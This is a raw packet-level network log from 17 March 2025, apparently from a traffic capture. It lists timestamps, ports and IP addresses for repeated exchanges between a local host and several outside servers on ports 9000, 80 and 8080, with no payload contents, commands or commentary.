Mar 17, 2025 12:27:59.755419016 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.755481005 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.807426929 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.807495117 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.855407000 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.855628014 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.903486013 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.903557062 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:27:59.955393076 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:27:59.955488920 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.007471085 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.007761002 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.059395075 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.059448004 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.107369900 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.107425928 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.159398079 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.159446955 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.207403898 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.207475901 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.255436897 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.255492926 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.303370953 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.303426027 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.351401091 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.351495028 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.399383068 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.399435043 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.451513052 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.451657057 CET	60233	9000	192.168.2.8	46.4.73.118
Mar 17, 2025 12:28:00.492876053 CET	9000	60233	46.4.73.118	192.168.2.8
Mar 17, 2025 12:28:00.493998051 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.498758078 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.498847008 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.498965025 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.504030943 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.849679947 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.854568005 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854600906 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854615927 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854625940 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854635954 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854646921 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.854654074 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854660034 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854671001 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854676962 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.854681015 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854692936 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.854732037 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.854753971 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.859375954 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.859391928 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.859424114 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.859436035 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.859448910 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.859461069 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.859493017 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.859534979 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.860176086 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.860261917 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.911391973 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.911808014 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:00.963385105 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:00.963479996 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.011377096 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.011466026 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.059392929 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.059473038 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.111419916 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.111499071 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.159414053 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.159550905 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.211396933 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.211570978 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.259428978 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.259525061 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.307415009 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.307507992 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.355462074 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.355547905 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.403393030 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.403475046 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.451411963 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.451549053 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.499382973 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.499469995 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.551444054 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.551568985 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.599396944 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.599476099 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.647404909 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.647485971 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.696121931 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.696177959 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.747322083 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.747616053 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.797324896 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.797399998 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.843507051 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.843607903 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.891381979 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.891468048 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.939434052 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.939569950 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:01.987421036 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:01.987531900 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.039428949 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.039501905 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.087363005 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.087461948 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.135344028 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.135404110 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.187371016 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.187479973 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.235382080 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.235438108 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.283376932 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.283438921 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.331351042 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.331408024 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.379369974 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.379417896 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.427390099 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.427448988 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.475354910 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.475405931 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.523432016 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.523489952 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.575386047 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.575447083 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.626152039 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.626214981 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.671359062 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.671530962 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.720386028 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.720459938 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.767374039 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:02.767467022 CET	60234	80	192.168.2.8	206.189.109.146
Mar 17, 2025 12:28:02.993691921 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:21.879765034 CET	80	60234	206.189.109.146	192.168.2.8
Mar 17, 2025 12:28:21.880939007 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:21.887769938 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:21.887872934 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:21.887998104 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:21.893853903 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.240294933 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.245115042 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245129108 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245167017 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245178938 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245187998 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245218992 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.245243073 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245254040 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245255947 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.245270967 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245280027 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245310068 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.245325089 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.245392084 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.245446920 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.249917030 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.249927044 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.249938011 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.249983072 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.249999046 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.250000954 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.250010014 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.250019073 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.250066042 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.291414022 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.291543007 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.343463898 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.343540907 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.395446062 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.395550966 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.443485022 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.443572998 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.491424084 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.491486073 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.543417931 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.543560982 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.591430902 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.591536999 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.639419079 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.639497995 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.691404104 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.691536903 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.743423939 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.743505001 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.795419931 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.795531034 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.843476057 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.843556881 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.895459890 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.895668983 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.947402000 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.947480917 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:22.999435902 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:22.999510050 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.051417112 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.051584959 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.099380970 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.099608898 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.147387981 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.147531986 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.199389935 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.199482918 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.251373053 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.251526117 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.299401999 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.299504042 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.351398945 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.351492882 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.403414011 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.403498888 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.455384970 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.455472946 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.503370047 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.503421068 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.551454067 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.551599026 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.599369049 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.599479914 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.647387981 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.647468090 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.695399046 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.695482016 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.743370056 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.743432999 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.795365095 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.795438051 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.843420982 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.843528986 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.891453981 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.891592979 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.939415932 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.939500093 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:23.987441063 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:23.987509012 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.035394907 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.035501003 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.083436012 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.083575964 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.131407022 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.131515026 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.179394960 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.179552078 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.231406927 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.231472969 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.283406019 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.283466101 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.331392050 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.331448078 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.383430958 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.383594990 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.431425095 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.431504965 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.479382992 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.479454041 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.527482986 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.527667046 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.579415083 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.579540968 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.627432108 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.627552032 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.675450087 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.675549030 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.723418951 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.723504066 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.775415897 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.775481939 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.823411942 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.823553085 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.871428967 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.871562958 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.923422098 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:24.923526049 CET	60235	8080	192.168.2.8	194.164.198.113
Mar 17, 2025 12:28:24.971577883 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:43.255552053 CET	8080	60235	194.164.198.113	192.168.2.8
Mar 17, 2025 12:28:43.257033110 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.261801958 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.261877060 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.262043953 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.266725063 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.615622997 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.620645046 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620659113 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620703936 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.620721102 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620734930 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.620743036 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620762110 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.620840073 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.620841980 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620855093 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620898962 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.620909929 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620923042 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.620980978 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.621004105 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.621067047 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.621104956 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.621151924 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.625443935 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.625453949 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.625463963 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.625490904 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.625502110 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.625515938 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.625516891 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.625557899 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.625597954 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.671386003 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.671509027 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.723403931 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.723467112 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.771372080 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.771440983 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.823441982 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.823519945 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.871398926 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.871457100 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.919424057 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.919486046 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:43.971396923 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:43.971460104 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.023389101 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.023946047 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.075419903 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.075526953 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.123411894 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.123545885 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.171374083 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.171495914 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.223360062 CET	80	60236	45.82.65.63	192.168.2.8
